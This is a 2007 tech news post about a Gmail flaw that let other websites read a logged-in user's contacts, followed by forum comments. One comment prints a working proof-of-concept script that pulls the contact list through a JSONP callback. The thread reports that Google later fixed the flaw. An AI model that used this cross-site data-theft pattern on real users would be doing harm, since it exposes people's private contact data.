Monday, January 1st 2007

Gmail leaves your account open to spammers

A new flaw has been exposed in Google's Gmail service which could allow hackers to get hold of your contacts. When you log into your Gmail (Googlemail in some countries) account, Google will put your details into a JavaScript file. Because of this, if you browse other websites whilst logged into your account, any of them could potentially declare the function "google" and be able to get hold of all of your contacts. The only two ways to ensure your privacy is safe are to disable JavaScript in all websites except those you trust or to not browse other sites whilst logged into any Google service. Admittedly Gmail is still only a beta, but a fault like this could be quite serious.

Update: Disabling JavaScript did not solve this problem, however it appears that Google has now fixed this issue and your contacts list should be safe.
Source: Engadget
Add your own comment

16 Comments on Gmail leaves your account open to spammers

#1
spectre440
hopefully google will do the right thing, and plug that hole in their user's security.
Posted on Reply
#2
peach1971
Just use Firefox + Add-on NoScript.

Turn on Java to read your mails?
Lol, how far have we gone... :D

And here another usefull thing:
www.customizegoogle.com/

No more annoying ads! :D
Posted on Reply
#3
cdawall
where the hell are my stars
wondered how my account got spammed
Posted on Reply
#4
Atech
peach1971Turn on Java to read your mails?
Lol, how far have we gone... :D
This vulnerability has nothing to do with Java.
Posted on Reply
#5
pt
not a suicide-bomber
no spam for me :)
(i don't have java installed)
Posted on Reply
#6
peach1971
Nothing to do with Java?
Google will put your details into a JavaScript file. Because of this, if you browse other websites whilst logged into your account, any of them could potentially declare the function “google” and be able to get hold of all of your contacts.
Sorry, I don´t get it, Atech.
Posted on Reply
#7
Jimmy 2004
AtechThis vulnerability has nothing to do with Java.
Well, from what I read when posting this story it was a JS (JavaScript) file that causes this problem, and you disable Java to protect yourself so it must link to Java :confused:
Posted on Reply
#8
Atech
Jimmy 2004Well, from what I read when posting this story it was a JS (JavaScript) file that causes this problem, and you disable Java to protect yourself so it must link to Java :confused:
<script language="javascript">
function getContacts(response){
var output = "";
for(x=0;x<response.Body.Contacts.length;x++){
output += response.Body.Contacts[x].Name + " <" + response.Body.Contacts[x].Email + "> ";
}
alert(output);
}
</script>

<script language="javascript" xsrc="http://video.google.com/data/contacts?out=js&max=500 &psort=Affinity&callback=getContacts">
</script>
No calls to the Java API there.

Edit: Gah to having to escape characters within code tags ...
Posted on Reply
#9
Jimmy 2004
AtechNo calls to the Java API there.
Whatever the case is, log into your Gmail and click here to see a nice list of your contacts. I'm not sure how a hacker can get hold of this, but I expect it's true. The reason that it may no longer be using Java is because Google claim to have fixed the issue. I'm not expert on Java, I'm just informing people of what I find.

Edit: well I disabled JavaScript and that page still shows my contacts... but Gmail doesn't work. Probably need to clear my cookies ect.

Edit2: Disabling JavaScript does NOT seem to solve this problem, that link still shows my contacts after I have cleared all my internet data with Javascript disabled... and I can't even use the Gmail service!!!

Edit3: Couldn't the line
script language="javascript" xsrc="http://video.google.com/data/contacts?out=js&max=500 &psort=Affinity&callback=getContacts"
be linked to this?
Posted on Reply
#10
WarEagleAU
Bird of Prey
Good thing I dont use Gmail, too hard to get one anywho.
Posted on Reply
#11
mout12
WarEagleAUGood thing I dont use Gmail, too hard to get one anywho.
no. Go to mail.google.com, click 'SIGN UP', then enter your mobile phone number, and they'll send you a password via text message to your phone number. you'll have an account.
Posted on Reply
#12
Namslas90
Just proves that you can't rely on anyone to secure your PC, but yourself!
Posted on Reply
#13
cdawall
where the hell are my stars
WarEagleAUGood thing I dont use Gmail, too hard to get one anywho.
whats your email i have some signups left
Posted on Reply
#14
pt
not a suicide-bomber
i have 99, anyone wants :)?
Posted on Reply
#15
Bull Dog
Jimmy 2004Whatever the case is, log into your Gmail and click here to see a nice list of your contacts. I'm not sure how a hacker can get hold of this, but I expect it's true. The reason that it may no longer be using Java is because Google claim to have fixed the issue. I'm not expert on Java, I'm just informing people of what I find.
...snip.
That link doesn't work for me.....meaning that when I am logged into my Gmail acct, and when I click on the link all I get is this:
google ({
Success: false,
Errors: []
})

Using FireFox.
Posted on Reply
#16
Jimmy 2004
Bull DogThat link doesn't work for me.....meaning that when I am logged into my Gmail acct, and when I click on the link all I get is this:
google ({
Success: false,
Errors: []
})

Using FireFox.
Me too, I think they must've fixed it. I've updated the newspost again.

When I clicked that link earlier it would bring up a list in which you could find any info about your contacts you had saved.
Posted on Reply
Add your own comment
Dec 22nd, 2024 03:14 EST change timezone

New Forum Posts

Popular Reviews

Controversial News Posts